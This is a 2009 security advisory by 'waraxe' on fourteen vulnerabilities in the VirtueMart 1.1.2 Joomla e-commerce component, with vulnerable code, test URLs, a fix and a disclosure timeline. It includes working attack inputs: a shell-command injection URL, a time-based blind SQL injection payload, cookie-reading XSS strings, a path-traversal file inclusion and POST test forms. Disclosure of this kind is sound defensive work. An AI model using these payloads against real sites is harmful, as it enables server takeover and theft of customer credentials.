VirtueMart <= 1.1.2 Multiple Remote Vulnerabilities
来源 作者:waraxe 发布时间:2009-04-01
Author: Janek Vind "waraxe" Date: 24. January 2009 Location: Estonia, Tartu Web:
Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
VirtueMart is an Open Source E-Commerce solution to be used together with a Content Management System (CMS) called Joomla! (and Mambo). Joomla! and VirtueMart are written in PHP and made easy for use in a PHP/MySQL environment.
VirtueMart Joomla eCommerce Edition is affected by same vulnerabilities.
List of found vulnerabilities ===============================================================================
1. Remote Shell Command Execution in "shop.pdf_output.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: high Preconditions: 1. *nix (non-Windows) server 2. file "/usr/bin/htmldoc" must exist
Problematic source code: ----------------------------------------------------------- $showpage = vmGet( $_REQUEST, 'showpage'); ... if (@file_exists( "/usr/bin/htmldoc" )) {
$load_page = $mosConfig_live_site . "/index2.php?option=com_virtuemart& page=$showpage&flypage=$flypage&product_id=$product_id &category_id=$category_id&pop=1&hide_js=1&output=pdf"; ... passthru( "/usr/bin/htmldoc --no-localfiles --quiet -t pdf14 --jpeg --webpage --header t.D --footer ./. --size letter --left 0.5in '$load_page'" ); -----------------------------------------------------------
As seen from code snippet above, user submitted parameter "showpage" is used in unsafe manner without proper sanitization in interaction with operating system shell. This vulnerability allows an attacker to execute remote shell commands on the target server.
Example attack url:
http://localhost/virtuemart112/index.php?page=shop.pdf_output &option=com_virtuemart&showpage=';[shell command]
2. Remote File Inclusion in "show_image_in_imgtag.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: high Preconditions: 1. register_globals=on 2. allow_url_fopen=on (PHP < 5.2.0) 3. allow_url_include=on (PHP >= 5.2.0)
http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php? mosConfig_absolute_path=
3. Remote File Inclusion in "export.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: high Preconditions: 1. register_globals=on 2. allow_url_fopen=on (PHP < 5.2.0) 3. allow_url_include=on (PHP >= 5.2.0)
http://localhost/virtuemart112/administrator/components/com_virtuemart/export.php? mosConfig_absolute_path=
4. Sql Injection in "shop_browse_queries.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: high Preconditions: none Comments: 1. This is blind sql injection
Test 1:
http://localhost/virtuemart112/index.php?page=shop.browse &option=com_virtuemart&DescOrderBy=waraxe
Result (with Debug mode turned on):
500 - JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'waraxe LIMIT 0, 20' at line 11
Test 2:
http://localhost/virtuemart112/index.php?DescOrderBy= ,BENCHMARK(1000000,MD5(123))&option=com_virtuemart&page=shop.browse
Result: response delay as expected
Problematic source code: ---------------------------------------------- // Descending or Ascending Order? possible values: [ASC|DESC] $DescOrderBy = $vmInputFilter->safeSQL( $vm_mainframe->getUserStateFromRequest ( "browse{$keyword}{$category_id}{$manufacturer_id}DescOrderBy", 'DescOrderBy', "ASC" ) ); ... $q .= " ORDER BY $orderbyField $DescOrderBy"; ... $list .= $q . " LIMIT $limitstart, " . $limit; ... $db_browse->query( $list ); ----------------------------------------------
Use of "safeSQL()" does not make it secure!
5. Reflected XSS in "shop.downloads.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium Preconditions: none
http://localhost/virtuemart112/index.php?func=downloadRequest&option=com_virtuemart &page=shop.downloads&download_id="><script>alert(document.cookie);</script>
6. Reflected XSS in "mod_virtuemart_currencies.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium Preconditions: 1. Currency Selector module must be enabled
Problematic source code: ---------------------------------------------- if( !empty( $_POST )) { foreach( $_POST as $key => $val ) { if( $key == 'product_currency' || is_array($val) ) continue; $val = htmlspecialchars($val, ENT_QUOTES); echo "<input type="hidden" name="$key" value="$val" /> "; } } elseif( !empty( $_GET )) { foreach( $_GET as $key => $val ) { if( $key == 'product_currency' || is_array($val) ) continue; echo "<input type="hidden" name="$key" value="".htmlspecialchars($val, ENT_QUOTES)."" /> "; } } ----------------------------------------------
7. Reflected XSS in "notify.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium Preconditions: none
Test goes through POST, using html like this: ---------------------------------------------- <html><body><center> <form action="http://localhost/virtuemart112/administrator/ components/com_virtuemart/notify.php" method="post"> <input type="hidden" name="waraxe" value= "<script>alert(document.cookie);</script>"> <input type="submit" value="Test!"> </form> </center></body></html> ----------------------------------------------
8. Sql Injection in "mod_virtuemart_manufacturers.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium Preconditions: 1. Manufacturers module must be enabled 2. magic_quotes_gpc=off
Problematic source code: ---------------------------------------------- $category_id = vmGet( $_REQUEST, 'category_id', '' ); ... $query = "SELECT DISTINCT m.manufacturer_id, m.mf_name FROM #__{vm}_manufacturer m ... WHERE cx.category_id = '$category_id' "; ----------------------------------------------
9. Local File Inclusion in "store.shipping_module_form.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: low Preconditions: 1. attacker must have VirtueMart administration privileges
Problematic source code: ---------------------------------------------- $shipping_module = vmGet($_REQUEST, 'shipping_module', null);
if( $shipping_module ) { if( !include( CLASSPATH."shipping/$shipping_module" )) { ----------------------------------------------
http://localhost/virtuemart112/administrator/index.php? page=store.shipping_module_form&shipping_module= ../../../../../configuration.php&option=com_virtuemart
Fatal error: Cannot redeclare class JConfig in C:apache_wwwrootvirtuemart112configuration.php on line 2
So it's classical LFI (Local File Inclusion) security vulnerability, but it's exploitable only by attacker with admin privileges. Therefore security impact can be considered as low.
10. Sql Injection in shipping administration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: low Preconditions: 1. attacker must have Virtuemart administration privileges 2. magic_quotes_gpc=off
Some examples (actually there are more sql injections) -------------------------------------------------------------- function add(&$d) { ... $q = "INSERT INTO #__{vm}_shipping_carrier (shipping_carrier_name, shipping_carrier_list_order) VALUES ('"; $q .= $d["shipping_carrier_name"] . "','"; $q .= $d["shipping_carrier_list_order"] . "')"; ... function update(&$d) { ... $q = "UPDATE #__{vm}_shipping_carrier SET "; $q .= "shipping_carrier_name='" . $d["shipping_carrier_name"]; $q .= "',shipping_carrier_list_order='" . $d["shipping_carrier_list_order"]; $q .= "' WHERE shipping_carrier_id='" . $d["shipping_carrier_id"]."'"; ... function delete_record( $record_id, &$d ) { ... $q = "DELETE FROM #__{vm}_shipping_carrier WHERE shipping_carrier_id='$record_id'"; $db->query($q); --------------------------------------------------------------
Test 1:
1. open "Shipper edit/create form: http://localhost/virtuemart112/administrator/index.php?pshop_mode=admin& page=shipping.carrier_form&option=com_virtuemart
2. Insert this test string to "Shipper Company" input: war'axe
Result: 500 - An error has occurred.
JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'axe','')' at line 1 SQL=INSERT INTO jos_vm_shipping_carrier (shipping_carrier_name, shipping_carrier_list_order) VALUES ('war'axe','')
Test 2 (vmtoken must be valid):
1. http://localhost/virtuemart112/administrator/index.php?page=shipping.carrier_list& func=carrierDelete&shipping_carrier_id=war%27axe&keyword=&limitstart=0 &no_menu=0&option=com_virtuemart&vmtoken=2c807c5076c5504fb3c3b5bfea415103
Result: 500 - An error has occurred.
JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'axe'' at line 1 SQL=SELECT shipping_rate_carrier_id FROM jos_vm_shipping_rate WHERE shipping_rate_carrier_id='war'axe'
11. Disk Space Exhaustion in "show_image_in_imgtag.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: low Preconditions: none
http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php? filename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=2000&newysize=2000
http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php? filename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=1999&newysize=2000
http://localhost/virtuemart112/components/com_virtuemart/show_image_in_imgtag.php? filename=Aple_iPod_Nano_3_47cba5d6971f9.gif&newxsize=1998&newysize=2000
After tests it can be found, that directory "components/com_virtuemart/shop_image/product/resized/" contains resized images according to previous test requests. As filesize of images can be >1MB per file, then it's easy to make thousands of specially crafted requests and waste server's disk space till quota is exceeded. No authentication needed, no other mitigating factors.
12. Sql Injection in "shop.feed.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: low Preconditions: none
Test URL: http://localhost/virtuemart112/index.php?page=shop.feed&option=com_virtuemart &limit=1waraxe
Resulting error message (with debug turned on):
500 - JDatabaseMySQL::query: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1waraxe' at line 7 SQL=SELECT DISTINCT(product_sku), p.product_id, product_name, product_thumb_image, product_s_desc as description, p.cdate, p.mdate, c.category_name, c.category_id, category_flypage FROM jos_vm_product p, jos_vm_category c, jos_vm_product_category_xref cx WHERE product_publish = 'Y' AND product_parent_id='0' AND c.category_id = cx.category_id AND cx.product_id = p.product_id ORDER BY mdate DESC LIMIT 0, 1waraxe
As sql injection occurs in LIMIT part of the query, then probably it's not exploitable in current situation.
13. Reflected XSS and hash disclosure in "shop.debug.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium Preconditions: 1. Victim must be logged in as user
Test URL:
http://localhost/virtuemart112/index.php?page=shop.debug&option=com_virtuemart &Itemid=64&<script>alert(123);</script>
Test shows, that we have classic Reflected XSS case. But this is not all :) Let's log in as user and then issue request:
http://localhost/virtuemart112/index.php?page=shop.debug&option=com_virtuemart &Itemid=64
Resulting debug page has "Global Variables" tab, let's click it. Wow ... we can see password's hash and salt:
[user] => JUser Object ( [id] => 62 [name] => test [username] => test [email] => ***** [password] => 0c90b********bbf4:ISug*****6YN9Yg [password_clear] =>
There is no need for such information disclosure! In combination with Reflected XSS, shown before, attacker is able to steal victim's password hash and salt.
Suggestion - removing sensitive information from debug page.
14. Sql Injection in "product.product_move.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: low Preconditions: 1. attacker must have VirtueMart administration privileges
Problematic source code: ---------------------------------------------------------------- $products = vmGet( $_POST, 'product_id' ); $count= count( $products ); ... for( $i=0; $i < $count; $i++ ) { $products[$i] = intval($products[$i]); ... $db->query( 'SELECT `product_name` FROM `#__{vm}_product` WHERE `product_id` IN('.implode(',', $products).') ORDER BY `product_name`'); ----------------------------------------------------------------
At first glance it seems to be secure code because of "intval()". But what happens in case of arrays with non-numeric indexes? Example:
product_id[w] = waraxe
Testing is possible via POST request, so special html file is needed: ---------------------------------------------------------------- <html><body><center> <form action="http://localhost/virtuemart112/administrator/index.php? option=com_virtuemart" method="post"> <input type="hidden" name="pshop_mode" value="admin"> <input type="hidden" name="page" value="product.product_move"> <input type="hidden" name="product_id[w]" value="waraxe"> <input type="submit" value="Test!"> </form> </center></body></html> -----------------------------------------------------------------
Resulting error message (debugging is enabled):
JDatabaseMySQL::query: 1054 - Unknown column 'waraxe' in 'where clause' SQL=SELECT `product_name` FROM `jos_vm_product` WHERE `product_id` IN(waraxe,0) ORDER BY `product_name`
How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Upgrade to new version 1.1.3 ASAP
Disclosure Timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
11/27/08 Developer contacted 11/27/08 Developer's initial response 11/28/08 Fidings sent to developer 01/22/09 Patched version 1.1.3 released by developer 01/24/09 Public disclosure
Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke, to all active forum members and to anyone else who know me!
Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Janek Vind "waraxe"
Waraxe forum: Personal homepage: ---------------------------------- [ EOF ] ---------------------------------
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